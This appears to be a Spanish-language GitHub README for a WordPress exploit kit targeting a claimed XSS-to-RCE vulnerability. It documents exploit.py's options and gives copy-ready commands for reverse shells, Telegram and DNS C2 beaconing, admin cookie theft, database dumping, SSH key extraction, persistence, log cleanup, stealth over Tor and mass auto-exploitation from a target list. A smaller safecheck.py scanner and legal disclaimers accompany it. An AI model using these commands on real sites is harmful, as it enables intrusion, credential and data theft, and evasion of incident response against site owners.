
🛡️ CVE-2026-64638 - Suite de evaluación de seguridad de WordPress (CVSS 8.9) | Kit de herramientas de pruebas de penetración de WordPress 4.7.0-7.0.2. Incluye evaluación de vulnerabilidades y módulos de análisis avanzados. 🐍 Verificación segura y explotación, 2 modos. Kit de herramientas avanzado Blue&Red Team Best 2026-64638, solo uso autorizado. Manténgase legal <3zd

⚠️ SOLO USO ÉTICO – PRUEBAS DE SEGURIDAD AUTORIZADAS
Este repositorio proporciona herramientas únicamente para profesionales de seguridad autorizados, blue teams y probadores de penetración.
El acceso no autorizado a sistemas informáticos es ilegal según la CFAA (EE. UU.), la Computer Misuse Act (Reino Unido), el TCK 243/244 (Turquía) y leyes similares en todo el mundo.
CVE‑2026‑64638 es una vulnerabilidad crítica de XSS reflejado previa a la autenticación en las versiones 4.7.0 a 7.0.2 del núcleo de WordPress que permite a un atacante escalar un ataque XSS a ejecución remota de código (RCE) completa mediante la función Application Password.
strip_tags() de PHP y wp_kses_post() de WordPress analizan las etiquetas HTML de forma distinta, lo que permite que una entrada maliciosa supere la sanitización.wp-login.php). Tras un inicio de sesión fallido, la carga útil se refleja y se ejecuta en el navegador de la víctima.| Herramienta | Propósito | Usuario previsto |
|---|---|---|
exploit.py | Kit de explotación completo con reverse shell, persistencia, C2, escalada de privilegios, análisis forense de memoria, volcado de base de datos, extracción de claves SSH y escaneo masivo. |
git clone https://github.com/tc4dy/CVE-2026-64638-PoC-Exploit
cd CVE-2026-64638-PoC-Exploit
pip install -r requirements.txt
requests
urllib3
#ops
pymysql
mysql-connector-python
PySocks
requests[socks]
exploit.pysafecheck.py| Endpoint | Propósito |
|---|---|
/wp-login.php | Página de inicio de sesión: punto de inyección XSS |
Este software se proporciona únicamente con fines educativos y para pruebas de seguridad autorizadas.
| Red teams / pentesters autorizados |
safecheck.py | Comprobador de vulnerabilidades no intrusivo que detecta el reflejo de XSS y evalúa la postura de seguridad sin ejecutar ninguna carga útil maliciosa. Genera informes detallados. | Blue teams / auditores de seguridad |
| Característica | exploit.py | safecheck.py |
|---|
| Detección de vulnerabilidades | ✅ | ✅ |
| Detección de versión de WordPress | ✅ | ✅ |
| Detección de reflejo XSS | ✅ | ✅ |
| Captura de Application Password | ✅ | ❌ |
| Subida de plugin (RCE) | ✅ | ❌ |
| Reverse shell | ✅ | ❌ |
| Beaconing C2 (HTTP/DNS/Telegram) | ✅ | ❌ |
| Escalada de privilegios | ✅ | ❌ |
| Análisis forense de memoria | ✅ | ❌ |
| Volcado de base de datos | ✅ | ❌ |
| Extracción de claves SSH | ✅ | ❌ |
| Métodos de persistencia | ✅ | ❌ |
| Auditoría de cabeceras de seguridad | ❌ | ✅ |
| Comprobación de exposición de archivos de configuración | ❌ | ✅ |
| Comprobación de listado de directorios | ❌ | ✅ |
| Comprobación de exposición de phpinfo | ❌ | ✅ |
| Escaneo masivo | ✅ | ✅ |
| Soporte de proxy | ✅ | ✅ |
| Soporte Tor | ✅ | ✅ |
| Túnel Ngrok | ✅ | ❌ |
| Shell interactiva | ✅ | ❌ |
| Modo no intrusivo (seguro) | ❌ | ✅ |
| Salida JSON / informe | ✅ | ✅ |
| Escenario | Herramienta recomendada |
|---|
| Blue Team – verificar si su instalación de WordPress es vulnerable | safecheck.py |
| Auditoría de seguridad – evaluación de vulnerabilidades no intrusiva | safecheck.py |
| Red Team – pruebas de penetración autorizadas con explotación completa | exploit.py |
| Bug Bounty – pruebas de divulgación responsable | safecheck.py |
| Escaneo masivo – comprobar múltiples objetivos en busca de vulnerabilidades | exploit.py o safecheck.py |
| Respuesta a incidentes – comprobar si los sistemas están comprometidos | safecheck.py |
| Post-explotación avanzada – persistencia, C2, forense | exploit.py |
| Parámetro | Descripción |
|---|
-t, --target | URL de WordPress objetivo (p. ej. https://wordpress-site.com) |
-l, --list | Archivo que contiene una lista de objetivos (uno por línea) para escaneo masivo |
--lhost | Dirección IP local para callbacks de reverse shell |
--lport | Puerto local para reverse shell (predeterminado: 4444) |
--proxy | Proxy HTTP/HTTPS (p. ej. http://127.0.0.1:8080) |
--timeout | Tiempo de espera de la solicitud en segundos (predeterminado: 10) |
--retry | Número de reintentos (predeterminado: 3) |
--threads | Número de hilos para escaneo masivo (predeterminado: 5) |
--exploit | Explotar automáticamente los objetivos vulnerables durante el escaneo masivo |
--ngrok-token | Authtoken de Ngrok para túneles externos |
--payload-type | Tipo de carga útil XSS: reflected, dom_based, waf_bypass, case_manipulation, double_encoded |
--session-hijack | Habilitar secuestro de sesión (robar cookies de administrador) |
--dump-db | Volcar la base de datos de WordPress (requiere pymysql) |
--extract-ssh | Extraer claves SSH del sistema objetivo |
--tor | Enrutar el tráfico a través de Tor (socks5h://127.0.0.1:9050) |
--stealth | Habilitar modo sigiloso (suplantar cabeceras, retrasar solicitudes) |
--no-cleanup | Omitir la limpieza de registros después de la explotación |
--ssl-verify | Verificar certificados SSL |
--c2-type | Tipo de C2: http, dns, telegram |
--c2-server | URL del servidor C2 o token de bot de Telegram |
--auto-priv-esc | Escalada de privilegios automática tras obtener shell |
--memory-forensics | Habilitar el módulo de análisis forense de memoria |
-v, --verbose | Salida detallada (verbose) |
-q, --quiet | Modo silencioso (salida mínima) |
| Parámetro | Descripción |
|---|
-t, --target | URL de WordPress objetivo (p. ej. https://wordpress-site.com) |
-l, --list | Archivo que contiene una lista de objetivos (uno por línea) para escaneo masivo |
--timeout | Tiempo de espera de la solicitud en segundos (predeterminado: 10) |
--retry | Número de reintentos (predeterminado: 3) |
--threads | Número de hilos para escaneo masivo (predeterminado: 5) |
--proxy | Proxy HTTP/HTTPS (p. ej. http://127.0.0.1:8080) |
--tor | Enrutar el tráfico a través de Tor (socks5h://127.0.0.1:9050) |
--ssl-verify | Verificar certificados SSL |
--output | Archivo de informe JSON de salida |
-v, --verbose | Salida detallada (verbose) |
-q, --quiet | Modo silencioso (salida mínima) |
| # | Escenario | Comando |
|---|
| 1 | Comprobación rápida de vulnerabilidades | python safecheck.py -t https://wordpress-site.com |
| 2 | Escaneo detallado con informe | python safecheck.py -t https://wordpress-site.com --output report.json -v |
| 3 | Explotación completa con reverse shell | python exploit.py -t https://wordpress-site.com --lhost 192.168.1.100 --exploit |
| 4 | Usar carga útil XSS personalizada | python exploit.py -t https://wordpress-site.com --payload-type waf_bypass |
| 5 | Secuestro de sesión (robar cookies de administrador) | python exploit.py -t https://wordpress-site.com --session-hijack |
| 6 | Volcar la base de datos de WordPress | python exploit.py -t https://wordpress-site.com --dump-db |
| 7 | Extraer claves SSH | python exploit.py -t https://wordpress-site.com --extract-ssh |
| 8 | Usar Tor para anonimato | python exploit.py -t https://wordpress-site.com --tor --stealth |
| 9 | Beaconing C2 con Telegram | python exploit.py -t https://wordpress-site.com --c2-type telegram --c2-server "https://api.telegram.org/botTOKEN/chat_id" |
| 10 | Escaneo masivo desde archivo | python exploit.py -l targets.txt --threads 10 --exploit |
| 11 | Análisis forense de memoria tras obtener shell | python exploit.py -t https://wordpress-site.com --memory-forensics |
| 12 | Escalada de privilegios automática | python exploit.py -t https://wordpress-site.com --auto-priv-esc |
| 13 | Shell interactiva | python exploit.py -t https://wordpress-site.com -i |
| 14 | Túnel Ngrok | python exploit.py -t https://wordpress-site.com --ngrok-token YOUR_TOKEN |
| Comando | Descripción |
|---|
reverse | Iniciar listener de reverse shell |
persist | Aplicar métodos de persistencia (cron, systemd, rc.local, SSH, WP) |
clean | Limpiar registros e historial del sistema |
dumpdb | Volcar la base de datos de WordPress |
ssh | Extraer claves SSH |
priv | Escalada de privilegios automática |
mem | Ejecutar análisis forense de memoria |
c2 | Mostrar estado de C2 |
c2task | Comprobar tareas de C2 |
exit | Salir de la shell interactiva |
/wp-admin/authorize-application.php |
| Generación de Application Password |
/wp-admin/update.php?action=upload-plugin | Subida de plugin (RCE) |
/wp-content/plugins/{slug}/{slug}.php | Ejecución del webshell |
| País | Ley aplicable |
|---|
| Estados Unidos | Computer Fraud and Abuse Act (CFAA) – 18 U.S.C. § 1030 |
| Reino Unido | Computer Misuse Act 1990 |
| Turquía | TCK 243 (Acceso no autorizado), TCK 244 (Interferencia en el sistema) |
| Alemania | StGB § 202a (Espionaje de datos), § 202b (Interceptación de datos) |
| Francia | Loi Godfrain – Artículo 323-1 |
| Australia | Cybercrime Act 2001 |
| Canadá | Código Penal – Sección 342.1 |
| India | Information Technology Act 2000 – Secciones 43 y 66 |
| Japón | Ley de Prohibición del Acceso No Autorizado a Computadoras |